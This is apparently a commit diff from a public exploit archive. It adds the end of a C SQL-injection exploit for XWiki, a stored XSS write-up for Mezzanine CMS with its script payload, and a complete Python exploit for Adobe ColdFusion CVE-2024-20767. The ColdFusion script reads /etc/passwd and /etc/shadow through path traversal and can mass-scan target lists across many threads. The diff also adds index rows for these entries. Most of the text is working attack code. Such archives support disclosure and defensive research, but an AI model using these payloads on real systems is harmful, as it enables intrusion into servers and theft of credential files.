"⣿⢯⣿⠙⢦⠀⠀⠀⠀⣼⢁⣼⢇⢏⡿⠃⠀⡾⠀⡌⢀⡏⢰⡇⣿⢿⡇⢸⠻⠀⢸⡞⣯⡜⢦⠀⢷⠈⢻⡳⢤⡀⠈⠙⠒⠀⠙⢳⣅⠀⠙⣄⠀⠀⢸⣿⣿⣿⣿⣆⢰⣸⡄⠀⠀\n"
"⡏⣼⣿⠒⠒⠤⠤⢤⣸⠃⡼⡛⢸⣼⡇⢠⣠⠁⢸⠁⣼⡇⢸⠀⡿⣿⡇⠸⠀⠀⠀⢻⡘⣧⠘⣇⠘⡆⠀⠹⣦⡈⠓⠦⣄⡀⠀⠀⠉⠳⣄⠈⢇⠀⠐⢿⣿⡛⠟⠋⠀⡇⣧⠀⠀\n"
"⢠⣿⣿⠀⠀⠀⣠⡾⡿⣼⣧⡇⡇⣿⠀⠀⠻⣄⠀⠀⡇⡇⡆⠀⢻⣿⢇⢶⡀⢠⡄⠈⡿⡸⡆⢸⠀⢧⡀⠀⢻⠙⢆⠀⠀⠉⢳⡦⣄⣀⣈⠙⠾⣄⡀⠀⠀⢰⠀⠀⢠⡇⣿⠀⠀\n"
"⣸⣿⣿⣄⣤⣾⠟⢠⡇⡏⣿⡇⣧⣿⠀⣀⡀⠈⣧⠀⡇⡇⡇⢸⢸⣿⢸⣼⢷⡀⠹⣄⠁⢳⡁⠀⡇⢈⢣⠀⠈⡇⠈⢧⡀⠀⠀⢷⡀⢢⠈⢹⡛⠓⠙⠛⠒⠈⡇⠀⠸⡇⣿⠀⠀\n"
"⣿⣿⠟⣩⡞⠁⠀⢸⣷⠀⡟⡇⢸⠋⠻⢷⣝⢦⣿⣆⠀⡇⡇⢸⣾⣿⢼⣿⣼⣳⡄⢹⣧⡀⠁⠀⠗⢸⢸⠀⠀⡇⠀⠀⣷⡀⠀⠀⣷⡈⠀⠀⢧⢘⡀⠀⢀⠀⢸⡀⠀⣇⣿⠀⠀\n"
"⠛⣡⣾⡏⠀⠀⠀⠀⣿⠀⠃⢻⣼⡀⣠⡄⠙⠿⡟⢹⠘⣿⠁⠀⠀⣿⠀⢻⠈⡏⠻⡄⢿⢳⡀⠀⢀⡟⠸⡇⠀⢸⠀⠀⢸⣷⡀⠀⢳⠳⡀⠀⠸⡎⡇⠀⠸⡇⠀⢷⠀⢹⠇⠀⠀\n"
"⣴⣿⣿⡇⠀⠀⠀⠀⠸⣆⠀⠘⡿⣿⣿⣅⡀⢀⠟⠸⠀⢻⡥⠀⠀⣿⡄⢸⣆⣱⣀⠙⣦⢯⢳⠀⣸⢧⡇⣿⠀⠸⠀⠀⣸⣇⢳⠀⠘⢇⢹⡀⠀⣇⠃⠀⠀⡇⠀⡌⢷⡈⣆⠀⠀\n"
"⣿⣿⣿⡇⠀⠀⠀⠀⠀⠹⣄⢠⣿⣿⠟⠋⣵⠏⠀⠀⠀⠸⡇⠈⠙⡟⠛⢺⡷⣶⣯⣭⣈⣿⡟⡇⡟⡼⡇⣿⠀⡇⠀⢀⣿⡞⠚⡀⣼⠘⠆⣇⠀⢸⠀⠀⢀⡇⠀⠁⢀⡷⣜⣄⠀\n"
"⣿⣿⣿⠇⠀⠀⠀⠀⠀⠀⠘⢺⡏⢿⣤⠞⠁⠀⠀⠀⠀⠀⣷⠀⠀⠀⠀⠸⡇⠀⢳⠈⠙⠻⢿⣿⢀⣧⡇⣿⣰⠃⢀⣾⣿⣵⠀⣠⠏⡇⠀⣿⠀⡎⢠⣠⣼⡇⠀⢸⢿⡇⠘⠻⣄\n"
"⣿⣿⣿⠒⠒⠒⠒⠒⠒⠒⠀⢸⡇⠀⢧⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⣴⠈⠃⠀⠀⣸⠏⣼⡸⡟⣳⠃⢀⡞⣏⢋⣼⡟⠁⠀⡇⢠⠏⣸⣱⣾⣟⡿⡡⢀⡿⡿⡇⠀⠀⠈ \n"
"⣿⣿⡏⠀⠀⠀⠀⠀⠀⠀⠀⠘⣇⠀⠀⢹⡦⠤⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⡟⠀⠀⠀⣰⠏⠀⢃⢧⡷⠃⣠⠏⠀⠉⡾⢹⢻⠀⡶⠣⠎⢀⣾⣻⠿⣸⠛⢡⡞⣼⠁⠱⠀⠀\n"
"⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⡇⠀⠀⠖⠁⠀⠀⠞⡞⢁⣴⠥⠖⠛⢿⢷⣾⡾⡆⣿⣶⣋⣾⣿⣏⠀⢹⡾⠋⢰⠁⠀⠀⠀⠀⠀\n"
"⣿⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣇⠰⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⡿⠁⠀⠀⠀⠀⠀⢀⣼⣵⡞⠁⢀⡔⠀⣿⣁⣼⠅⣧⠁⠘⣿⡼⠋⢸⡆⠀⢷⢸⠀⠀⠀⠀⠀⠀⠀\n"
"⡏⠈⠉⠲⣄⡀⠀⠀⢀⣀⣤⣶⣿⣿⠀⢈⠙⠶⢦⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⠁⢸⠃⢉⡿⠀⠀⢸⣽⠃⠀⠹⣄⣼⠷⠃⠀⠀⢳⠀⠘⣯⢧⠀⠀⠀⠀⠀⠀\n"
"⣤⣤⣤⣤⣤⣽⣷⣿⣿⣿⣿⣿⣿⣿⡇⠀⠙⠲⣤⠈⠙⠲⣤⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣬⣤⠤⠖⠚⠛⠉⠀⠀⠀⠀⣿⠀⠀⠀⣿⠁⠀⠀⠀⢀⣼⠃⢰⡏⠀⠁⠀⠀⠀⠀⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⡼⠁⠀⠀⣼⠙⠂⠀⣀⡶⠋⢀⣠⠞⠁⠀⠀⠀⠀⠀⠀⠀\n "
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠴⠚⠉⠀⠀⢀⡴⠁⠀⣠⠞⢁⣴⢾⣯⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⣀⣀⣀⣀⣀⣀⡠⢤⠞⠁⠀⠀⠀⠀⠀⠀⢀⣠⠤⠞⠋⢁⣀⣠⠤⠴⠚⠉⣀⣠⠜⢁⡴⣿⣧⣸⣿⣿⣿⣿⣿⣷⣶⣶⣦⣤⣄ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠉⠻⣅⠀⠀⠀⠀⡞⠀⠀⠀⠀⠀⢀⣠⠖⠋⠁⠀⠒⠊⠉⠁⠀⠀⠀⢀⣀⣭⣤⡖⢋⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⡀⠈⠓⠦⣄⣸⠁⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⣀⡤⠴⢺⣿⣿⣿⣿⣿⣿⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⢻⣀⣀⡤⠴⠶⠶⠶⠶⠦⢤⣤⠖⠋⠁⠀⣰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿ \n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⣀⡞⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⣀⡤⠴⠶⠶⠶⢤⣀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠋⠀⠀⠀\n"
"⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⡴⠋⠁⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀\n"
);
const char *name = "\e[1;37m\t\t\t[ Byte Reaper ]\e[0m\n";
int s = 0;
while (name[s] != '\0')
{
printf("%c", name[s]);
fflush(stdout);
usleep(100000);
s++;
}
printf("---------------------------------------------------------------------\n");
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&yourUrl,
"Target Url (Base URL)"),
OPT_STRING('c',
"cookies",
&cookies,
"cookies File"),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode"),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!yourUrl)
{
printf("\e[1;31m[-] Please Enter Your Url !\e[0m\n");
printf("\e[1;31m[-] Ex : ./exploit -u http://URL\\e[0mn");
printf("\e[1;31m[-] Exit Syscall\e[0m\n");
exitAssembly();
}
checkWaf(yourUrl);
printf("---------------------------------------------------------------------\e[0m\n\n");
printf("[+] Start Exploit Sql...\e[0m\n");
if (cookies)
{
selecetCookie = 1;
}
if (verbose)
{
verbose = 1;
}
injection(yourUrl);
return 0;
}

33
exploits/multiple/webapps/52385.txt Normal file
View file

@ -0,0 +1,33 @@
# Exploit Title: Mezzanine CMS 6.1.0 Stored Cross Site Scripting (XSS)
via component /blog/blogpost/add
# Date: 23/07/2025
# Exploit Author: Kevin Dicks
# Vendor Homepage: https://github.com/stephenmcd/mezzanine
# Software Link: https://github.com/stephenmcd/mezzanine
# Version: 6.1.0
# Category: Web Application
# Tested on: Ubuntu Server 20.04.6 LTS (Focal Fossa), Firefox browser
version 136.0 (64-bit)
# CVE : CVE-2025-50481
# Exploit link : https://github.com/kevinpdicks/Mezzanine-CMS-6.1.0-XSS
## Summary:
A cross-site scripting (XSS) vulnerability in the component
/blog/blogpost/add of Mezzanine CMS v6.1.0 allows attackers to execute
arbitrary web scripts or HTML via injecting a crafted payload into a
blog post.
## Reproduction Steps:
1. Login to the admin portal.
2. Create a new blog post.
3. Insert source code, and enter the following payload:
```
<script>alert(document.location)</script>
```
4. Save the new blog post.
5. The blog post is published, and can be accessed by any user.
6. Stored XSS is executed.
--

168
exploits/multiple/webapps/52387.py Executable file
View file

@ -0,0 +1,168 @@
# Exploit Title: Adobe ColdFusion 2023.6 - Remote File Read
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahmsql
# Description: ColdFusion 2023 (LUcee) - Remote Code Execution
# CVE: CVE-2024-20767
# Vendor Homepage: https://www.adobe.com/
# Requirements: requests>=2.25.0, urllib3>=1.26.0
# Usage: python3 CVE-2024-20767.py -u http://target.com -f /etc/passwd
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import urllib3
import requests
import argparse
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor, as_completed
urllib3.disable_warnings()
class ColdFusionExploit:
def __init__(self, output_file=None, port=8500):
self.output_file = output_file
self.port = port
self.verbose = True
self.session = requests.Session()
def print_status(self, message, status="*"):
colors = {"+": "\033[92m", "-": "\033[91m", "*": "\033[94m", "!": "\033[93m"}
reset = "\033[0m"
print(f"{colors.get(status, '')}{status} {message}{reset}")
def normalize_url(self, url):
if not url.startswith(('http://', 'https://')):
url = f"http://{url}"
parsed = urlparse(url)
if not parsed.port:
url = f"{url}:{self.port}"
return url.rstrip('/')
def get_uuid(self, url):
endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
try:
response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10)
if response.status_code == 200:
match = re.search(r"<var name='uuid'><string>(.+?)</string></var>", response.text)
if match:
uuid = match.group(1)
if self.verbose:
self.print_status(f"UUID: {uuid[:8]}...", "+")
return uuid
except Exception as e:
if self.verbose:
self.print_status(f"Error: {e}", "-")
return None
def read_file(self, url, uuid, file_path):
headers = {"uuid": uuid}
endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100"
try:
response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10)
if response.status_code == 200 and response.text.strip() != "[]":
return response.text
except:
pass
return None
def test_files(self, url, uuid):
files = {
"Linux": ["etc/passwd", "etc/shadow", "etc/hosts"],
"Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"]
}
for os_name, file_list in files.items():
for file_path in file_list:
content = self.read_file(url, uuid, file_path)
if content:
self.print_status(f"VULNERABLE: {url} - {os_name} - {file_path}", "+")
if self.verbose:
print(content[:200] + "..." if len(content) > 200 else content)
print("-" * 50)
if self.output_file:
with open(self.output_file, "a") as f:
f.write(f"{url} - {os_name} - {file_path}\n")
return True
return False
def exploit_custom_file(self, url, uuid, custom_file):
content = self.read_file(url, uuid, custom_file)
if content:
self.print_status(f"File read: {custom_file}", "+")
print(content)
return True
else:
self.print_status(f"Failed to read: {custom_file}", "-")
return False
def exploit(self, url, custom_file=None):
url = self.normalize_url(url)
if self.verbose:
self.print_status(f"Testing: {url}")
uuid = self.get_uuid(url)
if not uuid:
if self.verbose:
self.print_status(f"No UUID: {url}", "-")
return False
if custom_file:
return self.exploit_custom_file(url, uuid, custom_file)
else:
return self.test_files(url, uuid)
def scan_file(self, target_file, threads):
if not os.path.exists(target_file):
self.print_status(f"File not found: {target_file}", "-")
return
with open(target_file, "r") as f:
urls = [line.strip() for line in f if line.strip() and not line.startswith('#')]
self.print_status(f"Scanning {len(urls)} targets with {threads} threads")
self.verbose = False
vulnerable = 0
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(self.exploit, url): url for url in urls}
for future in as_completed(futures):
url = futures[future]
try:
if future.result():
vulnerable += 1
print(f"[+] {url}")
else:
print(f"[-] {url}")
except Exception as e:
print(f"[!] {url} - Error: {e}")
self.print_status(f"Scan complete: {vulnerable}/{len(urls)} vulnerable", "+")
def main():
parser = argparse.ArgumentParser(description="ColdFusion CVE-2024-20767 Exploit")
parser.add_argument("-u", "--url", help="Target URL")
parser.add_argument("-f", "--file", help="File with target URLs")
parser.add_argument("-p", "--port", type=int, default=8500, help="Port (default: 8500)")
parser.add_argument("-c", "--custom", help="Custom file to read")
parser.add_argument("-o", "--output", help="Output file")
parser.add_argument("-t", "--threads", type=int, default=20, help="Threads (default: 20)")
parser.add_argument("-q", "--quiet", action="store_true", help="Quiet mode")
args = parser.parse_args()
if not args.url and not args.file:
parser.print_help()
return
exploit = ColdFusionExploit(args.output, args.port)
exploit.verbose = not args.quiet
if args.url:
exploit.exploit(args.url, args.custom)
elif args.file:
exploit.scan_file(args.file, args.threads)
if __name__ == "__main__":
main()

6
files_exploits.csv
View file

@ -7460,6 +7460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
22781,exploits/linux/local/22781.txt,"Linux PAM 0.77 - Pam_Wheel Module 'getlogin() Username' Spoofing Privilege Escalation",2003-06-16,"Karol Wiesek",local,linux,,2003-06-16,2012-11-17,1,CVE-2003-0388;OSVDB-9027,,,,,https://www.securityfocus.com/bid/7929/info
14273,exploits/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",local,linux,,2010-07-08,2010-07-10,1,CVE-2010-0832;OSVDB-66116,,,,,
14339,exploits/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,local,linux,,2010-07-12,2010-07-12,1,CVE-2010-0832,,,,,
52386,exploits/linux/local/52386.py,"Linux PAM Environment - Variable Injection Local Privilege Escalation",2025-07-28,İbrahimsql,local,linux,,2025-07-28,2025-07-28,0,CVE-2025-6018,,,,,
35021,exploits/linux/local/35021.rb,"Linux PolicyKit - Race Condition Privilege Escalation (Metasploit)",2014-10-20,Metasploit,local,linux,,2014-10-20,2014-10-20,1,CVE-2011-1485;OSVDB-72261,"Metasploit Framework (MSF)",,,,
47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,,2019-10-24,2019-10-24,1,CVE-2019-13272,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb
23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - Chroot Breakout",2004-02-06,"Markus Mueller",local,linux,,2004-02-06,2016-09-06,1,CVE-2004-2073;OSVDB-3875,,,,,https://www.securityfocus.com/bid/9596/info
@ -10400,6 +10401,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple,,2008-02-18,,1,CVE-2007-5958,,,,,
25393,exploits/multiple/dos/25393.txt,"XAMPP - Insecure Default Password Disclosure",2005-04-12,"Morning Wood",dos,multiple,,2005-04-12,2013-05-13,1,CVE-2005-1078;OSVDB-15636,,,,,https://www.securityfocus.com/bid/13131/info
8337,exploits/multiple/dos/8337.c,"XBMC 8.10 - GET Multiple Remote Buffer Overflows (PoC)",2009-04-01,n00b,dos,multiple,,2009-03-31,2016-09-29,1,OSVDB-54002;OSVDB-54001;OSVDB-54000,,,,,
52382,exploits/multiple/dos/52382.txt,"Xlight FTP 1.1 - Denial Of Service (DOS)",2025-07-28,"Fernando Mengali",dos,multiple,,2025-07-28,2025-07-28,0,CVE-2024-0737,,,,,
44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple,,2018-06-06,2018-06-06,1,CVE-2018-4241,"Heap Overflow",,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1558
8148,exploits/multiple/dos/8148.pl,"Yaws < 1.80 - Multiple Headers Remote Denial of Service Vulnerabilities",2009-03-03,"Praveen Darshanam",dos,multiple,,2009-03-02,,1,OSVDB-52408;CVE-2009-0751,,,,,
32104,exploits/multiple/dos/32104.txt,"ZDaemon 1.8 - Null Pointer Remote Denial of Service",2008-07-21,"Luigi Auriemma",dos,multiple,,2008-07-21,2014-03-09,1,CVE-2008-3314;OSVDB-47124,,,,,https://www.securityfocus.com/bid/30340/info
@ -11742,6 +11744,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,,
52208,exploits/multiple/webapps/52208.py,"Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE)",2025-04-15,"Eui Chul Chung",webapps,multiple,,2025-04-15,2025-04-15,0,CVE-2024-50672,,,,,
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
52387,exploits/multiple/webapps/52387.py,"Adobe ColdFusion 2023.6 - Remote File Read",2025-07-28,İbrahimsql,webapps,multiple,,2025-07-28,2025-07-28,0,CVE-2024-20767,,,,,
40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,,
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,,
@ -12092,6 +12095,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65973,,cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf,,,
14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple,,2010-06-23,2010-06-23,1,OSVDB-65774,,cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf,,,
49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,,2020-12-03,2021-01-06,0,CVE-2020-29477,,,,,
52383,exploits/multiple/webapps/52383.txt,"Invision Community 4.7.20 - (calendar/view.php) SQL Injection",2025-07-28,"Egidio Romano",webapps,multiple,,2025-07-28,2025-07-28,1,CVE-2025-48932,,,,,
44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80,2018-06-20,2018-11-17,0,CVE-2018-10956,"Metasploit Framework (MSF)",,,http://www.exploit-db.comipc-orchid-x86_64_2.0.5-jessie.deb,https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80,2018-06-20,2018-11-17,0,CVE-2018-10956,Traversal,,,http://www.exploit-db.comipc-orchid-x86_64_2.0.5-jessie.deb,https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
24792,exploits/multiple/webapps/24792.txt,"IPCop 1.4.1 - Web Administration Interface Proxy Log HTML Injection",2004-11-30,"Paul Kurczaba",webapps,multiple,,2004-11-30,2013-03-15,1,CVE-2004-1210;OSVDB-12243,,,,,https://www.securityfocus.com/bid/11779/info
@ -12200,6 +12204,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36419,exploits/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",webapps,multiple,3790,2015-03-17,2016-10-10,1,OSVDB-119612,"Metasploit Framework (MSF)",,,,
18012,exploits/multiple/webapps/18012.txt,"Metasploit Web UI 4.1.0 - Persistent Cross-Site Scripting",2011-10-20,"Stefan Schurtz",webapps,multiple,,2011-10-20,2020-08-22,1,OSVDB-80287,,,,,http://www.rul3z.de/advisories/SSCHADV2011-033.txt
39822,exploits/multiple/webapps/39822.rb,"Meteocontrol WEBlog - Admin Password Disclosure (Metasploit)",2016-05-17,"Karn Ganeshen",webapps,multiple,,2016-05-17,2016-05-17,0,CVE-2016-2296,"Metasploit Framework (MSF)",,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-133-01
52385,exploits/multiple/webapps/52385.txt,"Mezzanine CMS 6.1.0 - Stored Cross Site Scripting (XSS)",2025-07-28,"Kevin Dicks",webapps,multiple,,2025-07-28,2025-07-28,0,CVE-2025-50481,,,,,
39597,exploits/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",webapps,multiple,80,2016-03-23,2016-03-23,0,,,,,,http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
51543,exploits/multiple/webapps/51543.c,"Microsoft SharePoint Enterprise Server 2016 - Spoofing",2023-06-26,"Amirhossein Bahramizadeh",webapps,multiple,,2023-06-26,2023-06-26,0,CVE-2023-28288,,,,,
48768,exploits/multiple/webapps/48768.py,"Mida eFramework 2.9.0 - Remote Code Execution",2020-08-27,elbae,webapps,multiple,,2020-08-27,2020-08-27,0,CVE-2020-15920,,,,,
@ -12570,6 +12575,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49827,exploits/multiple/webapps/49827.js,"Xmind 2020 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
34237,exploits/multiple/webapps/34237.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (2)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,multiple,,2010-07-02,2014-08-02,1,,,,,,https://www.securityfocus.com/bid/41322/info
49073,exploits/multiple/webapps/49073.txt,"xuucms 3 - 'keywords' SQL Injection",2020-11-19,icekam,webapps,multiple,,2020-11-19,2020-11-19,0,CVE-2020-28091,,,,,
52384,exploits/multiple/webapps/52384.c,"XWiki 14 - SQL Injection via getdeleteddocuments.vm",2025-07-28,"Byte Reaper",webapps,multiple,,2025-07-28,2025-07-28,0,CVE-2025-32429,,,,,
49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,,2021-01-18,2021-01-18,0,,,,,,
52136,exploits/multiple/webapps/52136.txt,"XWiki Platform 15.10.10 - Remote Code Execution",2025-04-07,"Al Baradi Joy",webapps,multiple,,2025-04-07,2025-04-07,0,CVE-2025-24893,,,,,
17111,exploits/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) - Persistent / Reflective Cross-Site Scripting",2011-04-04,"Michael Brooks",webapps,multiple,,2011-04-04,2016-10-27,0,OSVDB-78072;OSVDB-71717;OSVDB-71716;CVE-2011-5025;OSVDB-71715,,,,http://www.exploit-db.comyaws-1.88.tar.gz,https://sitewat.ch/en/Advisory/4

Can't render this file because it is too large.